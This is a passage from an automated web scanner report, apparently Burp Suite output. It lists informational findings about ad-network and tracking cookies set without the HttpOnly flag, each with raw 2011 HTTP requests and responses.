16.178. http://r1-ads.ace.advertising.com/site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms?01AD=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg&01RI=9A4FEFFF11C0CF6&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=MTMxNTA5NzMwOTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; A07L=CT-1; ACID=Rq690013151032380008; ASCID=Rq690013151032380008; C2=HIuYO9aFHYIiGD8sQdwSkaMwSKMCdbdRrxK4IEscGAHtnggnraAc; F1=Bcg4i5EBAAAABAAAAEAAgEA; BASE=oTwUgn8fYrESn1B!; ROLL=XpwfYsHr/Y/PQCL!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Comscore: CMXID=2115.924216.800700.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 04 Sep 2011 03:04:39 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 607
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 03:04:39 GMT
Connection: close
Set-Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; expires=Sun, 02-Oct-2011 03:04:39 GMT; path=/; domain=r1-ads.ace.advertising.com
Set-Cookie: F1=Bgs6i5EBAAAABAAAAQIASEA; domain=advertising.com; expires=Tue, 03-Sep-2013 03:04:39 GMT; path=/
Set-Cookie: BASE=oTwU6n8fYrESn1x8Qj3fRMy2B+vjVEHntdO7zpq9oQmkUQOfNzVeo/Q5dYCetd+R/VlITpQfPOUsbbj+pnMLNfBe9fnQLuLn9xikW3Jh5OoVuUMh/BIsMV8iPy2BtcWfXIfMiw7+OMKalrgWYeeNQFCpfXb1VEv0cHsxuTJBgslffdkG7KRfwyvkPxeMWLYNGk8b1YA5ZAxZ13KVsZVXrXYYjnmkAAK!; domain=advertising.com; expires=Tue, 03-Sep-2013 03:04:39 GMT; path=/
Set-Cookie: ROLL=XpwfCsHr/Y/PQCLUeRRTtt2oYGcdkyfKC9wh3xK/PCaAn1iIwv0zeaXV4OrEbOoMlyB7+9MpX6VwzAST0/+akVnT3g4UEMP57hFdkrM6/aUrBbArbW/6ycoQ622FNcK6vnsyTNNOrLANP7s7ffSv/iN2X7QQFvxkaY0/ZGTQjjSjcY3TDpzci4TsvbMO4QGQ7ofB9wJJg67LD1PYDy0Q8zYz/O8Z6ZN!; domain=advertising.com; expires=Tue, 03-Sep-2013 03:04:39 GMT; path=/
Set-Cookie: 36466465=_4e62e207,0637251025,804611^994513^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 88962478=_4e62e208,7215437176,800700^999589^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7215437176=_4e62e208,7215437176,800700^999589^1183^0,1_; domain=advertising.com; path=/click
Set-Cookie: 0866435731=_4e62ea87,0866435731,0^0^0^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7114534657=_4e62ea86,7114534657,0^0^0^0,0_; domain=advertising.com; path=/click
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=00008007
...[SNIP]...

16.179. http://r1-ads.ace.advertising.com/site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=drsYO9aFHYIiGW8sQdwSkaYxSKMCdbdBwB; GUID=MTMxNTA5NzMwOTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.949949.804621.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 04 Sep 2011 03:03:34 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 03:03:34 GMT
Content-Length: 1099
Connection: close
Set-Cookie: C2=GquYO9aFHYIiG97sQdwSka0vSKMCdbdxpxK4IEscG6GtnggnraobCKCC9mUxvhaOBcxWGsG; domain=advertising.com; expires=Tue, 03-Sep-2013 03:03:34 GMT; path=/
Set-Cookie: F1=BYo6i5EBAAAABAAAAMAASEA; domain=advertising.com; expires=Tue, 03-Sep-2013 03:03:34 GMT; path=/
Set-Cookie: BASE=oTwUin8fYrESn1x8Qj3fRMy2B+vjVEH!; domain=advertising.com; expires=Tue, 03-Sep-2013 03:03:34 GMT; path=/
Set-Cookie: ROLL=XpwfasHr/Y/PQCLUeRRTtt2oYGcdkyP!; domain=advertising.com; expires=Tue, 03-Sep-2013 03:03:34 GMT; path=/
Set-Cookie: 36466465=_4e62e207,0637251025,804611^994513^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 88962478=_4e62e208,7215437176,800700^999589^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7215437176=_4e62e208,7215437176,800700^999589^1183^0,1_; domain=advertising.com; path=/click

document.write('<iframe src="http://view.atdmt.com/CNT/iview/286710721/direct;wi.300;hi.250/01/4105058118?click=http://r1-ads.ace.advertising.com/click/site=0000804621/mnum=0000949949/cstr=36466465=_4
...[SNIP]...

16.180. http://rp.gwallet.com/r1/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rp.gwallet.com
Path:   /r1/optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/optout?optout&nocache=0.5617585 HTTP/1.1
Host: rp.gwallet.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ra1_uid=4711648038188259648; ra1_sid=22

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rp.gwallet.com/r1/optout?check&rand=1315135032927
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Mon, 03-Sep-2012 11:17:12 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=g5; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=15; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sun, 04-Sep-2016 11:17:12 GMT; Path=/; Domain=gwallet.com; Version=1


16.181. http://rs.gwallet.com/r1/pixel/x420r5261063  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x420r5261063

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x420r5261063 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 134
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4639578929876828096; Expires=Mon, 03-Sep-2012 02:42:38 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Mon, 03-Sep-2012 02:42:38 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1" width="1" height="1" border="0" ></body></html>

16.182. http://rs.gwallet.com/r1/pixel/x420r9614074  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x420r9614074

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x420r9614074 HTTP/1.1
Host: rs.gwallet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
Cookie: ra1_uid=4639578929876828096; ra1_sid=22; BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=

Response

HTTP/1.1 200 OK
Content-Length: 134
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4639578929876828096; Expires=Mon, 03-Sep-2012 03:55:25 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Mon, 03-Sep-2012 03:55:25 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1" width="1" height="1" border="0" ></body></html>

16.183. http://s.amazon-cornerstone.com/iu3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.amazon-cornerstone.com
Path:   /iu3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iu3?d=assoc-amazon.com&rP=http%3A%2F%2Fwww.nationmultimedia.com%2Fhome%2Fbanner%2Findex_bottom.php&cB=8433638485148549 HTTP/1.1
Host: s.amazon-cornerstone.com
Proxy-Connection: keep-alive
Referer: http://rcm.amazon.com/e/cm?t=nationmultime-20&o=1&p=48&l=st1&mode=books&search=novel%20best%20selling&fc1=000000&lt1=&lc1=3366FF&bg1=FFFFFF&f=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ad-privacy=0; ad-id=Ayy0HVI91kopvWsXdVMP4Ng

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:27:14 GMT
Server: Server
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Type: text/html;charset=ISO-8859-1
Cneonction: close
Set-Cookie: ad-id=Ayy0HVI91kopvWsXdVMP4Ng; Domain=amazon-cornerstone.com; Expires=Thu, 01-Jan-2037 00:00:01 GMT; Path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 65

<html><body style="background-color:transparent">
</body></html>

16.184. http://s.xp1.ru4.com/coop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /coop

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coop?action_id=4&version=old&nocache=0.7580675 HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=BO-00000000670935830

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 10:59:27 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Set-cookie: X1ID=OO-00000000000000000; domain=.ru4.com; path=/; expires=Sun, 04-Sep-2041 06:59:27 GMT
Location: http://s.xp1.ru4.com/coop?action_id=4&version=old&test_flag=1
Content-length: 0
X-Cnection: close


16.185. http://search.spotxchange.com/partner  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.spotxchange.com
Path:   /partner

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner?adv_id=6498&uid=17200647&img=IMG HTTP/1.1
Host: search.spotxchange.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: history-0=eNrVUMtugzAQPKf%2F0srghIjcQjHEqGCVOGB8I4YIAwGkvoK%2Fvg6k7Q%2B0hx53Z2d2ZujWfzAMY7nYONbyfo9ivH3CHLmbjPaKdK%2BK1EgRGQBx9urcbN%2B4YYOSOS2ur1ho4S6u%2BIjXQvWX0O1lziJVpMmJ%2Bx7ge7zOqd4rBAgVMFR4RWBoRbSXxdl7KdKDJCayonqY%2BaqXWRqbnAVA67SitQf%2BOGkDIrEZuQLOf5GpPTUZiysGnfEI%2BcD9ZGRm28z41sLyx5PYBe8cBtUx%2BdYzNF8JX2eZ56seyNLilKfP2lNjhRRdInf6tfzCxDmpebqqy8Ruy50ziK653eKPKZf2X%2Fhex2Cirtm1rpq5QhJo2As6t736%2B7bdZozcA%2FhXbdPfbfvuEyw79EU%3D; user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUxMDMyNjMK

Response

HTTP/1.1 204 No Content
Date: Sun, 04 Sep 2011 03:21:42 GMT
Server: Apache
Content-Location: partner.html
Vary: negotiate
TCN: choice
P3P: CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV ADMa"
Set-Cookie: partner-0=eNptzMEKgjAYAOBzvUtgbqwSOhhbMmn%2BqGttu%2BUgmGV2CGR7%2BsRz1%2B%2FwEXzYr7ITwZuWNTy%2FcMtoZuQY4f2N0DMEvpyMLpNuUEEjFa0uH7Y4J6blOxfHCTz3gAQRMid8UNgVr2B08%2BlS7CF9zi5CJWtU0esk%2BuXc%2Fjvvt3p5gI5eSBcEzdOKutmS4%2FoHJhU1KQ%3D%3D; expires=Mon, 02-Jan-2012 03:21:42 GMT; path=/; domain=.spotxchange.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 03:21:42 GMT
Cache-Control: no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html


16.186. http://srv.clickfuse.com/pixels/create.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srv.clickfuse.com
Path:   /pixels/create.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixels/create.php?name=criteo&expire=30 HTTP/1.1
Host: srv.clickfuse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: criteo=tagged

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Date: Sun, 04 Sep 2011 03:59:21 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR", policyref="/w3c/p3p.xml"
Server: Apache
Set-Cookie: criteo=tagged; expires=Tue, 04-Oct-2011 03:59:21 GMT; path=/; domain=.clickfuse.com
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,...........D..

16.187. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?mt_exid=5&redir=http%3A%2F%2Fr.openx.net%2Fset%3Fpid%3D0b83a084-dd0b-4bfe-9e2e-ab3706fc9955%26rtb%3Duuid%253D%5BMM_UUID%5D HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=5730&cb=1737249030&ct0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A//www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917//pubclick//Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4e62cac5-3093-5789-301b-6f4e7fbf3921; ts=1315103145

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca8 3240
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 04 Sep 2011 02:28:10 GMT
Location: http://r.openx.net/set?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&rtb=uuid%3D4e62cac5-3093-5789-301b-6f4e7fbf3921
Connection: Keep-Alive
Set-Cookie: ts=1315103290; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 02:28:10 GMT
Content-Length: 0


16.188. http://t.mookie1.com/t/v1/event  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /t/v1/event

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/event?migClientId=2451&migAction=ibehavior_tidal&migSource=mig&migDest=http%3A%2F%2Fuav.tidaltv.com%2F3PDPHandler.aspx%3Ftpdp%3D25%26app%3D3%26segs%3D&vid=0 HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; id=4612741554684080402; mdata=1|4612741554684080402|1315103146

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 03:23:10 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=4612741554684080402; path=/; expires=Wed, 03-Oct-12 03:23:10 GMT; path=/; domain=.mookie1.com
Set-Cookie: mdata=1|4612741554684080402|1315103146; path=/; expires=Wed, 03-Oct-12 03:23:10 GMT; path=/; domain=.mookie1.com
Location: http://uav.tidaltv.com/3PDPHandler.aspx?tpdp=25&app=3&segs=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


16.189. http://t4.liverail.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t4.liverail.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?metric=rsync&p=1001&redirect=http%3A%2F%2Fsearch.spotxchange.com%2Fpartner%3Fadv_id%3D6498%26uid%3D17200647%26img%3DIMG HTTP/1.1
Host: t4.liverail.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Tue, 29 May 1984 15:00:00 GMT
X-LR-BE: 182
Set-Cookie: lr_uds=a%3A1%3A%7Bi%3A1001%3Bi%3A1315106486%3B%7D; expires=Thu, 20-Jan-2039 03:21:26 GMT; path=/; domain=liverail.com
X-LR-TIMESTAMP: 1315106486
X-LR-UID: 17200647
X-LR-SID: 0
X-LR-UA: Chrome/;Windows NT 6.1
Location: http://search.spotxchange.com/partner?adv_id=6498&uid=17200647&img=IMG
Content-type: text/html
Content-Length: 0
Connection: close
Date: Sun, 04 Sep 2011 03:21:26 GMT
Server: lighttpd/1.4.28


16.190. http://tag.admeld.com/nai-status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /nai-status

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai-status?nocache=0.663569 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 242
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 04 Sep 2011 11:38:01 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/verify/cookie
...[SNIP]...

16.191. http://tag.admeld.com/nai-test-opt-out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /nai-test-opt-out

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai-test-opt-out HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
